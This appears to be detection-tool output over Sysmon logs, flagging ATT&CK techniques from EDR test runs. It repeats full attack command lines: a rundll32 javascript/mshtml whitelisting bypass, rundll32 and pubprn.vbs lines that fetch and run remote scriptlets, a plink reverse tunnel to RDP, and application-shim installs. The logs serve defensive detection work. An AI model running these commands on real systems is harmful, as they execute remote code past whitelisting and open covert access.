747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1,"
1
5
4
1
0
0x8000000000000000
4977
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:15.502
747F3D96-6657-5D3F-0000-001011298D00
1004
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6657-5D3F-0000-001029198D00
1808
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
1
5
4
1
0
0x8000000000000000
4977
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:15.502
747F3D96-6657-5D3F-0000-001011298D00
1004
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6657-5D3F-0000-001029198D00
1808
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
1
5
4
1
0
0x8000000000000000
4977
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:15.502
747F3D96-6657-5D3F-0000-001011298D00
1004
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6657-5D3F-0000-001029198D00
1808
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966480
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:58:20.894
365ABB72-57EC-5C91-0000-001097810900
2848
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb"
C:\Users\user01\Desktop\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1,"
1
5
4
1
0
0x8000000000000000
4975
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:15.202
747F3D96-6657-5D3F-0000-001029198D00
1808
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966464
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:52:47.364
365ABB72-569F-5C91-0000-0010D96C0800
3140
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contains suspicious command ( plink.exe),1,"
1
5
4
1
0
0x8000000000000000
1940899
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-02-16 10:02:21.934
365ABB72-DFAD-5C67-0000-0010E0811500
2312
C:\Users\IEUser\Desktop\plink.exe
Release 0.70
Command-line SSH, Telnet, and Rlogin client
PuTTY suite
Simon Tatham
plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test
C:\Users\IEUser\Desktop\
PC01\IEUser
365ABB72-D6AB-5C67-0000-002056660200
0x26656
1
High
SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4
365ABB72-D92A-5C67-0000-0010CB580900
3904
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1,"
1
5
4
1
0
0x8000000000000000
4971
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:10.619
747F3D96-6652-5D3F-0000-001058828C00
348
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6652-5D3F-0000-0010B9708C00
5844
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
1
5
4
1
0
0x8000000000000000
4971
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:10.619
747F3D96-6652-5D3F-0000-001058828C00
348
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6652-5D3F-0000-0010B9708C00
5844
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
1
5
4
1
0
0x8000000000000000
4971
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:10.619
747F3D96-6652-5D3F-0000-001058828C00
348
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-6652-5D3F-0000-0010B9708C00
5844
C:\Windows\System32\cmd.exe
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") )",1,"
1
5
4
1
0
0x8000000000000000
4969
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:10.292
747F3D96-6652-5D3F-0000-0010B9708C00
5844
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"
1
5
4
1
0
0x8000000000000000
4968
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.526
747F3D96-664D-5D3F-0000-0010BB5D8C00
5572
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
1
5
4
1
0
0x8000000000000000
4968
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.526
747F3D96-664D-5D3F-0000-0010BB5D8C00
5572
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
1
5
4
1
0
0x8000000000000000
4968
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.526
747F3D96-664D-5D3F-0000-0010BB5D8C00
5572
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"
1
5
4
1
0
0x8000000000000000
4967
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.475
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-664D-5D3F-0000-0010F1498C00
6836
C:\Windows\System32\cmd.exe
cmd /c rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.134377,2019-03-20T00:52:47.134377+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966449
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:52:47.054
365ABB72-569F-5C91-0000-001012610800
2548
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
1
5
4
1
0
0x8000000000000000
4967
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.475
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-664D-5D3F-0000-0010F1498C00
6836
C:\Windows\System32\cmd.exe
cmd /c rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"
1
5
4
1
0
0x8000000000000000
4967
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:05.475
747F3D96-664D-5D3F-0000-00108D5B8C00
912
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-664D-5D3F-0000-0010F1498C00
6836
C:\Windows\System32\cmd.exe
cmd /c rundll32 AllTheThings.dll,EntryPoint
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966444
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:52:26.194
365ABB72-568A-5C91-0000-0010D24B0800
4072
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
5006
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:34:45.524
747F3D96-6675-5D3F-0000-0010875C8F00
4036
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
747F3D96-6675-5D3F-0000-0010AA498F00
4184
C:\Windows\System32\cmd.exe
cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
